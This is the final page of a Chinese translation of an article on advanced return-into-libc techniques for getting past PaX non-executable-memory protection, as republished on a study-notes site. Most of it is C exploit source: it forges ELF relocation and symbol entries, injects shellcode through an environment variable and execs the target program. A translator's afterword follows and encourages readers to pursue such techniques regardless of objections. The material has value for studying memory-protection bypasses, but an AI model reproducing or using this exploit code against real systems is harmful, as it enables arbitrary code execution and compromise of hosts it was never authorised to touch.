高级返回库函数exploit代码实现

        memset(thebuf.hell, ''''x'''', sizeof(thebuf.hell));
        memcpy(thebuf.hell, hellcode, strlen(hellcode));

        thebuf.r.r_info = 7 + 256 * real_index;
        thebuf.r.r_offset = FRAMESINDATA + sizeof(thebuf) + 4;
        thebuf.sym.st_name =FRAMESINDATA + offsetof(struct ourbuf, mmapname) + NAME_ADD_OFF- STRTAB;
        thebuf.sym.st_value = FRAMESINDATA + sizeof(thebuf) + 4;
       
        #define ANYTHING 0xfefefe80
        thebuf.sym.st_size = ANYTHING;
        thebuf.sym.st_info = (unsigned char) ANYTHING;
        thebuf.sym.st_other = ((unsigned char) ANYTHING) & ~3;
        thebuf.sym.st_shndx = (unsigned short) ANYTHING;

        strcpy(thebuf.mmapname, mmap_string);

/* setup_zero[_abs] functions prepare arguments for strcpy calls, which
are to nullify certain bytes
*/
        setup_zero(&thebuf,
            offsetof(struct ourbuf, r) +
            offsetof(struct my_elf_rel, r_info) + 2, 0);

        setup_zero(&thebuf,
            offsetof(struct ourbuf, r) +
            offsetof(struct my_elf_rel, r_info) + 3, 1);

        setup_zero_abs(&thebuf,
            (char *) mysym + offsetof(struct my_elf_sym, st_name) + 2,
                    offsetof(struct ourbuf, sym) +
                offsetof(struct my_elf_sym, st_name) + 2, 2);

        setup_zero_abs(&thebuf,
            (char *) mysym + offsetof(struct my_elf_sym, st_name) + 3,
                    offsetof(struct ourbuf, sym) +
                offsetof(struct my_elf_sym, st_name) + 3, 3);

        setup_zero(&thebuf,
            offsetof(struct ourbuf, mymmap) +
            offsetof(struct mmap_plt_args, start), 4);

        setup_zero(&thebuf,
            offsetof(struct ourbuf, mymmap) +
            offsetof(struct mmap_plt_args, offset), 5);

        setup_zero(&thebuf,
            offsetof(struct ourbuf, mymmap) +
            offsetof(struct mmap_plt_args, reloc_offset) + 2, 6);

        setup_zero(&thebuf,
            offsetof(struct ourbuf, mymmap) +
            offsetof(struct mmap_plt_args, reloc_offset) + 3, 7);

        strcpy(str, "STR=");
        memcpy(str + 4, &thebuf, sizeof(thebuf));
        str[4 + sizeof(thebuf)] = 0;
        if (sizeof(struct ourbuf) + 4 >
            strlen(str) + sizeof(thebuf.mmapname)) {
                fprintf(stderr,
                    "Zeroes in the payload, sizeof=%d, len=%d, correct it !\n",
                    sizeof(struct ourbuf) + 4, strlen(str));
                fprintf(stderr, "sizeof thebuf.mmapname=%d\n",
                    sizeof(thebuf.mmapname));
                exit(1);
        }
        execle("./pax", "pax", 0, env, 0);
        return 1;
}
<-->
p.s Any problem( concerning the technique, or translation), welcome pass the E-mail<mail to:roohacker@263.net> to proceed the discussion,and very welcome give any advise, and
thank.（任何问题，不吝赐教，谢谢～）

后记：匆忙完成了这样的翻译，显得激动和痛苦。作者是耳熟能详的内核级的漏洞发现专家，作者通过对Pax阻止堆栈缓冲溢出（比如通过禁止数据段可执行的内核补丁）机理分析，怎样逃避Pax的保护和怎样加强保护的解决方案，进行的防守和攻击，一张一盍，甚是精彩；在Pax的项目中有许多对ELF可执行链接文件的技术文档和页面不可执行的阐述，特别是"不可执行"苦于自己对保护模式下的汇编不了解，如履薄冰。

作者在过去的溢出技术之为基础，提出lib函数以及动态链接返回这些新的技术，在高级的exploit中具体的实现作了精要的分析。本文以期抛砖引玉，"虽然掌握这些技术，对于狂热的计算机爱好者不是什么坏事，也许你在讨论这些技术的时候，有人试图阻止你，或你想了解它们的时候，有人给你带来了不愉快的感受，忘记这些人。just do it。"我相信你们明白我说什么。

申明:本文译者保留中文修改权力，未经译者同意，不得任意拷贝，转载！！
=EOF=

 << 上一页  [11] 

Copyright ＠ 2007-2012 敏韬网(敏而好学，文韬武略--MinTao.Net)（学习笔记） Inc All Rights Reserved.
闵涛 E_mail:admin@mintao.net(欢迎提供学习资源)

鄂公网安备 42011102001154号

站长：MinTao ICP备案号：鄂ICP备11006601号-18